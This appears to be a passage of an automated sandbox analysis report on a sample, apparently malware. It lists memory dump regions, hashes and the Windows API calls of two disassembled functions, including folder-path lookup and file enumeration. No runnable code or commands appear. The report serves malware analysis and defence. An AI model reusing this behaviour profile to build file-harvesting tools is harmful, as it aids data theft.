                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                        • String ID:
                        • API String ID: 300741435-0
                        • Opcode ID: db74730de1725eae242100a26a0aba466b5babf038da0f7002b10cdb773b4f60
                        • Instruction ID: 61805dfc3afc6c61c6e3b7014d167d710912378f8449244fc6e3c95d2856d329
                        • Opcode Fuzzy Hash: db74730de1725eae242100a26a0aba466b5babf038da0f7002b10cdb773b4f60
                        • Instruction Fuzzy Hash: A6F04932904603DAEB35BBBC984AB4A3FA1BF80721F21414BF444AA3D2DB646941DA56
                        Function 005D4F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 005D8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 005D8E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 005D4F7A
                        • lstrcat.KERNEL32(?,005E1070), ref: 005D4F97
                        • lstrcat.KERNEL32(?,014A8948), ref: 005D4FAB
                        • lstrcat.KERNEL32(?,005E1074), ref: 005D4FBD
                          • Part of subcall function 005D4910: wsprintfA.USER32 ref: 005D492C
                          • Part of subcall function 005D4910: FindFirstFileA.KERNEL32(?,?), ref: 005D4943
                          • Part of subcall function 005D4910: StrCmpCA.SHLWAPI(?,005E0FDC), ref: 005D4971
                          • Part of subcall function 005D4910: StrCmpCA.SHLWAPI(?,005E0FE0), ref: 005D4987
                          • Part of subcall function 005D4910: FindNextFileA.KERNEL32(000000FF,?), ref: 005D4B7D
                          • Part of subcall function 005D4910: FindClose.KERNEL32(000000FF), ref: 005D4B92
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                        • String ID:
                        • API String ID: 2667927680-0
                        • Opcode ID: 58d742c6dc4aecf89a95789e7d1cfea2ad12b1d1cc9119059aaefc6b551e8e6a
                        • Instruction ID: 9259e683ca95305a5381409ae9ddf065c6c47a6064e2564219e674f00f819477
                        • Opcode Fuzzy Hash: 58d742c6dc4aecf89a95789e7d1cfea2ad12b1d1cc9119059aaefc6b551e8e6a
                        • Instruction Fuzzy Hash: F8219B769003096BC7A8F7B4DC5AEED373CB794300F004559B69A52181EE7496C98F92